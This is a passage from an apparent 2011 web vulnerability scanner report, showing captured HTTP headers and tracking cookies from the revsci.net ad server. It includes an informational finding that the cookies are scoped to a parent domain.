Set-Cookie: rsi_segs_1000000=pUPF4kmheQIMDjaxY4NY56qG7poa4ScLEaatLDiorNn5vw/ZUtic7CPZq60bIzTlnSCIjQNpmQyiPpn1WLZYGIVHHqRL8VuyK4KTktWpKfhIdHIBwclAI+6iD3yXxATNyXVdCP9qr5pUf86eVqDRYrXnrWOQjJGgQmy7sH3W0QYN9ncBmAi6AFeBtqgO+BHtTmqf+IwWdMW+vn20BWfxvnJZS8x1vTAmlPu7yTn9sxzlDvQISj2WEjZNX5rXV5ukaTRHGuM2yeuQT4RICgZT5x2mDJvn8tq9GJ7UH/gE6iPm5BKu3WqKlqylGDQsXLxPXLrxUvqZgL/GXlsGJHcV2yLjheFx52zg/AdJWYX0xIqaWFDAinkd+HFgH/FBcPcf5PGHkf42QFcsCVqWq77hxoYmwYkrpfC7Hs8gZrse1DI9+qNwbwtyVVHII0+JZJa1OaEzmF6Zw8e7llMjMyCkhULZ21J9kYowe2hqB6T83cVhkCcqx3pt3vCz1JWV+51wLTq7ZHPu9iPjPSzpK3S+ft1SGY1b15QeMEL8FbeKr45VXaZhA4iyTvuoNgHNfNAwuf5ZTSqHt3njl/nLryYbUcwVcj0rU4iQDzK3OJqawxSQEscdP/rysIqog/GQ2d00Vor80g0DqI5PW3StZUxHSWn8Mulk5ukpRBDquCzWhZQqzAYIWPSu++uiy6wK+qWj/nKwno0H8DqYoSUH0/lR3qsSkiJMZXAyDMdC0rBuy4Er5vBhC4RQE/AZM7twEeK2MA2nim3FhYD81F+53dMLxegwtk8NtBOnMUobxgR4EvlW+teQygc0uHK8DJ1E; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:01 GMT; Path=/
Set-Cookie: rtc_kcMU=MLvv+TUxJohm57br/FOrg2mN7irC3DjP1ChBHkkDb2IH8Z6qLwZuWqGjy/Xuyg8v3sLBnXh6nihFPfp5QX5po+dN7bkhx0QKD/5YN7WzJvEDzwSyPz62Cul+KglQgrX5vPPAe1CK28tHuk74SxbuB/5g6RILMlAqYeIB0b2WQ2t28icY+SrSW/6Kzkes3pUyJBJi3gt1fxDymPsZXtPKBYKayaDMoE+LgxBJ/Z3oV8cJo6xGzO9MLZzrsI+PM2wT9lcWsIQeqULwQ3sZ26fAMT8TUCTApzuN6ZfsvZBUX4Bn/9Nttluzu8pI+x201/iywameeIYU+xIwlOP44MexBIqTFjZxYkFnT6r/d1xrzVq8hABxsk6HQLKkVQ/hufkg0OV12sNiozq3QmmpdvMOeaz9oYijP8Jqz9sVES6wIJrY912WZUq86mAotiqSp7Aip5Di4j5G1EPb1WYFoJ75Mn1juc21COMuyJ1PAOrNoYcVp62fXYeuSrC5/wvdhnnl2ikfBv/Q8Mlhgc2B+mf8H3iYB0pOJeuoERtZrxEVSqGJNpqZHfSiX+/P6eWdV8VVrbqa07+7Re8BjtCkk3J++p8aWiZ5tmvfMTlGdi0tBBnd++BjGRuXe5gf44V3TFnjLg6CEA+ItNtFpPoN+VTrtekt7fWHiv9qZxRUrY3oWjLEDhrNcvxHqtM7ajrkbGmSSDnOnwEw5CTl5P34hl7zLs6myZ89x4lRsUJjk+cus7GKc2W1iQtJmLku/F7YmQVRJD3bBY5KH8QMlQKaAnyi9CuofxqdgpmMPSjiQhKouroR+/5UPL+Mv5z+NaIRq0wVq923bzwc3TVwQQI36BpdIH+tXXF/s54FuB7KkQXXismKvJY0urrqkoe/scuBgc9ludNQuaoer52Joj3ZNHYX4Cly0xE7arjUI4S3e7FIou3+8kbkKmLPPI9ROTHv+iDDW0B+4N6rxV9SSd1czMHvAIGnyDEiOQWbG6WD9Sz8tI8tEpX49F/AXT4rbr7ZvYfmjlVjVOmpRk6yDItMM6qbS2nOrGz7e2IUZ2WsOtANwymQ+1fkpA6GgxYTod2bQVP8b3VHhay2n6s5GiR7taZwMTqWwf6JaYzaQwo80gCKJaHnFvQN5/YfXrWj8VeDTDpEi343GY9za4OFbFIZv0LrWuvS0OVFXmetkxHqZFhwM7E+1pgyN+BYZvKN7vG6Vm47Sot7+qpSdK0ALf+2NHpOr3Gl3LwpIIo3VFbL51D8V+aMR3DgHuQf8ZvcZhX4Xbr4FOwpfCtHmdTRGEVzeUkL8LZamEtwj4w6Yz+LWxhw81gLO1Wuk+uAt/XYjl6syapSuyDgjtcs2erJi5FuUafQ2ouwbVh+EtK4zJekoeuQTScrBVWaIsIeN4pPvucKoNxcpriPW9fGVnUbJC7RLoQdh/F/V56dVpJxoymviwHrhGSNWr6V6rFz0mj4TGPRrrYDLz4P5tGDIw+bsClu3qVMIrbr+iZoyjj95GxxVFGn+GK8a2SvWD2SQY5E00xSBkHhEggHdCmbZy0W58DQGjkpHkbUNZrD1pQoJWvrKUDqRqQaq76AKojnIMK8UBv+lTvPAukuHf/CV3FAWzP3s/3akxHYHewjdMtaPoohOkyozTgM4fn4KyK36Bkx8OXS9/Y9RNMjdMk9bN7kN9K1r9YocIHCprV5QsKqzDdUGZFNsd0K7vjhqnxIawZEekSftzrzr+V4PBpqXHyvrMz2xJR8Mm/BNFzivwyc6N5H+3VwKkU5mMzaXTqdgMPBb21rbXuFqjapzAshj7aq3pOIw1WMNXDMUD/lzcx+HVg2zKjKeNuhcU98EgbGfaTd8lqdHo8e04Br8g4y/WOnYP5P8hlflZ3H5NJx7gNJhqwhXEPxCJQJnbMy8agJi8SCvgybh0VM6RFknfAjzKiHkx71x/uJra8Op+U7vrMBkFtL/E+m4C8c8Z+Ei3YwigXXHGAinyqBElDKt2OXpzrs5dbpF8aXYd+tQbQFDfNmLP+kPq+uf4WuEQfSSqvwxT4bQnK6GHjn87PxfKPVqRgvf9Pf+BSiqslMY++NGjq39PP+L5KwipVGVgx0exRgGLKUCazhEScXnQR7bph2Fmt1LkGj0R1sQCwlJSi6iVxq8T4J7K+20X9K+hCUasUevqLWvFn423U2U31SPTP67gzqAtD5AFa9VT2IVFAKU4/zLc/sgH4VO37wxL3iNZ7mafyN1thMZakPxlR2iESZQamufwdLkrM5aoG84loT0/TRxv6+OMRd/qLK+JDSBNIV78X2nW0vnubOIxWAGCC2qs7m0TeyvDgUXVGrkUWHD6zrQFepj58ZyPUR55QDAsNOv15Oai7mpLQgzP+HG0hEctmFoEjAtlJTyLfGfKaVOtIP3PNzJwotx+qZMBQ2A1bkJQrrv0Tpna46xVNWMgKEkyfGMN4QVKoPSRnLpuIpS1V0uh663fu+9GzRvnBAaOs8+IeU4bU3aARm0G6HYzeSlPY6VSmca2XlLlDJoxYnT+TQWIX4fPlY4eie4qjs5y22jxYd5U9aYM5Fdq2X5wdPg9T6Do+OZcRV7yXenEb6UwSDf3RSAm0IY+SD8ipE9LwBZvhfmJdFeEr0R405UAb4866ScRZRKQXvpb30RXkj6tqRSb01fmAPW4zIxeirqQiOXvD31vw5+mO+tvvXbK6z7h9WtctO9lQvhzCNEOmY5pQJIw33vytolFLDAbLUBYj/rhTME43fKZmQdGKEbA==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:01 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:40:01 GMT
Content-Length: 1269

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

13.62. http://pix04.revsci.net/H07707/b3/0/3/0806180/396037982.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/396037982.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4j+huHIMHvC1v6FY5BAFiE2lu64fVY6/Tm+YLTQmufPZ01rc6vdg2v/oPlIcMX/OvdTE/uq6JB33VvBVw0bvGRPtPVF+v31Di+ws9t2aJi6fJfcYPOegZxQVZYR2KOkQqCbRlwQpf87la8qMva2fdzFQ0Rjo4nVnPf51DBQFzH8NDiVhMKNJfwEt1TQbc0vhwojK+4qaN2+/+HnGmsjpufR5knvKQ8N//2J3I/z/74Fa0h7TEN0cV4UW2ewjF12bJ/yIk67vBSwjKBtCVtSnBPdqT1qu883AOe0/82dCdGlIU/ssRDzOF7worKDEPkB4qT+ibUaClOlYPsIrC3MEcG2omGwvO5NgVAjNTNuSN58+l4tQTtPevwht31nvuqfXdgXWTuaXrXb1gXp1KTPtf7kb9UYzupdyf5PX0IkVznHvumJnRYiWH+nYii7438v9NbzKztvTTKaZfeCphtHUw7gnP/uNalPDQCz6vEcinpDTJr/HSESuGASxo7VdJ4qIj/oD8XuAK4TuCotbm/W/AovIHMJ5LD9Y/KYGPxsCPABSHpul6yzR9OAoNE8CsWbwoY76Fu2Z9q2aeQWqJN5VERwz6NAC3n4CZDyL1irUCYY+ZAHAiw7x2UhXmxSNo+ZrIbKJfUn8WDqKhYpr/lcG5TPKc0KmVcV8AoTfKiiUmZ5s8xWGNeTqs8WNiDI0CQHiUZtow78bGv8yAtv0vMAiLlB+b0aOEsxN4b9NFMR7Oi/Iufbc1FfizZQYxVJ5mYmbsBdDeOjWyy9wMy/g8ZjrVJ7rHZnfzJWYx84+SAgnbh/fcyRq; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:18 GMT; Path=/
rtc_4K_j=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:18 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/396037982.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F06%252Fhow-well-did-warner-musics-investors-do%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/06/how-well-did-warner-musics-investors-do/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; rsiPus_UVQe="MLsXrrEOpxpv55DW8tahZ2a57v6B9MeZL8/LTEv/jJaMn5vP+AaSaAp+hCNi+AtwkjW+RefXIKCFOb52VlJjrhtz/K0F0sWwzeRtpIdluxQek5zccFWsHLi2KM+ZjwDQCJV6O2MoC7r7STaLvqoiVDgloVhGO8DCKXMuP6S0vV0rRPMr+4FQiZzVfCjm2Lh/YkpRiZOeLmjUput9lWGJP3YqjHBlGcOU6aAjfq4ibjAuZaifAD12GV3MM7Os90125jNjah5Wl2JWXp3qoPuhHB9AUM9SIgkXkhFkXawqpm+PCmBL/rRLkNvRLqXizj1nhBAYelUSwkeFm7FWTh3bAW46hLZnvrDEVxxdlStZX6BLgYWkTXAr7NhngfM63uGRFwshyT0vUcCHgJHtHjwqb4gUK3U3Xlk/qfEyRIX0CYp3yLh6JdWmKGvTop06tZ57NWC7sYJivG6/XJXPh9kiLGmrABOJg0ZtLzzv+RMLBnPdhWdsfqH1YJwZA8zu9RM24LtkIq/AzoH015WS8axndbNjVCS0Jdy2g7tnbT4ibdPnWCemmw5DLKt17XfJqmkiLo4HNRYEQTYElhU3p/R3QmwWF2NkS16R2OV/GC10lX1vNK73Ft5xFtY5cXx7HXqH4NDid4ya00d1KxDbeGs2zvRtLTQCJxhQMPTkN34kd77C6G35LeJs2UWyjbLbkj1s/WgXM/d2WrgMkJc95WcpztNpB3veCMTXHtRpRP9j79S2eDr/UTmxj81QK+a4V5co3htv2qle9Hfxbq0j9sdrznUKUWJ5WYe1DlAdBsYmSOhPpIiQM0NaLNkyRwyAYAqCh7y5c4nZ6Tpo0r6KsvGwNO/t8O1yT6/GShgeyHXi1IvvZ0hstn43x+lxdVmaPuYX2sSMnPn4QKa12/fY0tPU6ddfwTD+9bgfDbO13IsHs6f5j2+r+EtZari1WX6nbA7T++lDvkLjcIrOl4601kWzvvi98b2F7OSSGvaJpJGavbpF/2BIRW/HC0h5tpMEm6W7+erhn93u1cBSkOvDoCr0GepDjUWA/1yQzlErEbvPIyhM3f4Jzt8JEyA2ePwz5BrQAUT9/dLtw8tewKVOKqP/qq9iEZ0wmdXyjf/AVeIc8f2yvlCzvSY+nfgoZk3nuvpBn+TM//Se4rR/DBpuCUDXQuA7A6XXEa7vK0oRNNNeyJKHti3Q1fiLowLkcct3KanqtvmCIU6n0kuFI6nT1Ahq/vOxwTNJbEJOQVxP2vHai7ZVs1Qa6BwHlMkcXR6E6DXWn7nbH651+v741MwSOh0TCFMQTTNGUekw4gX6f9HtRzUy5C/ACJ4xJ7a+tKlQGoDR42VY9foLr0PtTN/oCK3ykMmboo7thtABUtmg"; rsi_us_1000000="pUMV4ymjOCYULQEE166YFQ6DmFfDqOqv5R0Sep/xDdMQzQnGPlweaJXw308lcxsF58vOxVNcs8R89Us/bQw/0uEcBlgm3HbVBaqZciMXxA7ZQVsQNiAf++dJGYq1/xNl73YlZqAJtiAniZK+6WJ9mDbp1ivhzL5nEis7wXnPalOc+X8R2RVg+y8UNaZy5ZOc+H8kd4SG3Oo03tz7/dw18dKTWdxukwoaubmDFQHTMm4sRKbDfKN48UPoYMTs6BX1A4LF46V440ElFpoeJitf2h/pLwbuK0ljGz39v62Sma+Zo73lcvqhSmbjkU1Q6kZQoclEYeUyfIqfQY3sCsUUa8Sy9z7ZcgnF1atSKLPhTXaf6OoqzQEfeQWe3wpIUGn2GHtXLVGm45mmFmqunA7jZO2aHzuLCTp28NqBu8kCH+xHOE6jb7/4z7ZPkQJ+u/D+sZL25ZZoIAnJ4uU+LqTXIUpslqyUB5oWsUbJLKSoK89sf5wC46cWKHLCUCUx7V+Vn5AoBfDmY0qerCSkq63sxMnKVc7Y2mLTInWjV/ewZU9UjHPMkHGBtTX8t75ArQil/Na2GRTFUr5fhdfgzx5oueUv1FPRvGVMAAqoGtR13qVB/Vg2keSh/FCyLjGc7uE/9s+WRiFezbsVZeCcC+d9Eb880BuvdonWkyFfw1avjO6jM5wSjPV0ATxo8i0yFWFbNJIhhHcqIHXKggZNdINPohBJjEC1kJGLwFSXfTmEkpyH3TofsHIdXiJBg8muA/Jaj3c2fgkIteiYcB2Gz4Wn7j5HgmfS2ecJe+Trq7ITr9gPIZRpsJSIaO3EOUuYIwjyNdvXn8MfyMoxNDKjRes+Q8bR2sJdjoX8lZOkDh5J3PsAg0ikelhbA+xEPpzCrSjQCR2VevyKfKb/K0DBlXBwCdBzJqyGXNGQSDeXGHOCnhhj57KZMNSbLbSuOz5S21Yml1cbecDFyQsykG1JkFEr1ZDlBPWhf0lFBV6XAFRVrJ/a/JXiiBb4Eeg0AJ8vdp9Ilk5Na13QOPb71fp0boUamxNQpFz2NH9rpR1TOzhJz32LBycYZQry+MdshyoyJQ15G5TxeWDaczW4lSsMVYpvvQzqS8vRkGLOgMshXUu2E+a6xgsVGc11kHB8/aLJkwXFkcx4BF0L4s4ICThTh7CcKzozKJmM4LzFXXaINqTogC3wV5sXvBwSQfSVUd9lpwd9bs34Cb1OEjgd7rqkmnwwqP5uXurOGd8EYTeaGuv/qZPb8bTTalHpXy+PkGYZX13lAxeMItepWLPcaLLBpAYBKZ/Ihq1fKdq4TQe38T7YgQh+wnvRH1fjYGJmt5DWwZOw3wbIad2fJZShuZWCNnyIB6KCbPN4G/KTzUNy5kVqO+pBsdZW05zyp5FIuP0vYNGbMBkdNgMWUed6K/hEUdmSGEyP19JTJtDeHAag63fQkEjJ6twXzWTr1I7NaNzc+vCaGz5HPRVZafnlO/ulNenk6eGxbU9msVlICW6Fsoac7neLMtXq3KnjAoQSzlc37GR17Uli9FXO/9DpV+1KMKVSzhTj7dEU13glsLz96Zewco5QSNCjx3VKQ82gqES+uLicq8VrbcQZ8bZUFsiEyYTxlZ+fS6/EYnLjJ9Bk6LAgUDFoLFqGEFdxm9qf31Gqq6yE+3FP0sXUhv9CTG9Qao3c6D69SN73qQ3I+LREv/fxXOnYd5NAs+zwVcmF/PHUAgKmZMsxjhKOlt4kOsS+FetbxfaCgkZcpZ4P36eyny+I4yUu0lDINI8+eBDvAUCY3h2n89Pz1nhuWK7Q534Q7w=="; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4j+henIMH/C100a+jtCu45rT9IYbFYbvkn1IvjQmufPZU63k5HlskvBlDss6Igu8xVRBiNmaK4Lic/M7qqdLKXWdboCsn61rq5AkztuKb0IvXekGDZnEl7VxenkiyCDg81HVKjG4wjkLb+T/rqFLOIEHC1m126ThWdH4Oibt5g6+6wxRQoVxtNa6HvCKmJiPgVsa1pO+T3aT0ejKdP7PlgnzcY1VCoyQDLtLVTvH6BS62tKSX6Gss5B41RKwjVX9Do5QX+V0znhrEm9Z1DYYdkJ6gOUa5i60P1kHsPF7FPnj1MB3MWvIuzzuKa626UKVYCvhZydsMMUPnURLDJKNckPDNbr0LsKc1kCWsQOVkekvaGGDMK+I9eStphrvq6k2G/uk49gspfTYatcLNnIimAsxFKobA5H7QSijZ13S7Xq+lO0XZpFzdiav8PzEpMeAPBVodiYbPR+3Swq9aFFCiZrA9dUa9ZotE63wsOYqGUJLAKlP/5x+umISCTrqbquCGh7QaKEQX0F3MayZ3FReUei1S6NcVRY4yLPzfxFRV9bIE1VbtW4uoF7AqCIfIu1NMJi82Gim3KWeZZnzDEbFI6wSqC0v5UU68Asl3ZAoWF99qLQVi8YoxpbGRkzJddHYPVrDD5AFYqmLiTgvig/G1qfs48EJBCz0QOWh/cbstO41QnJ39fJXw8C3g9BAo/gYivG2p8469jMJyUokOBaJo0BXBEWGG7WjNVWuTmEH+T6puL7ix2jFHkKEVtVinFQv8bsnT+c1qIbf54B2suX9LG78U7o3XFQfjk2GmmWBxw==; rtc_TX1Q=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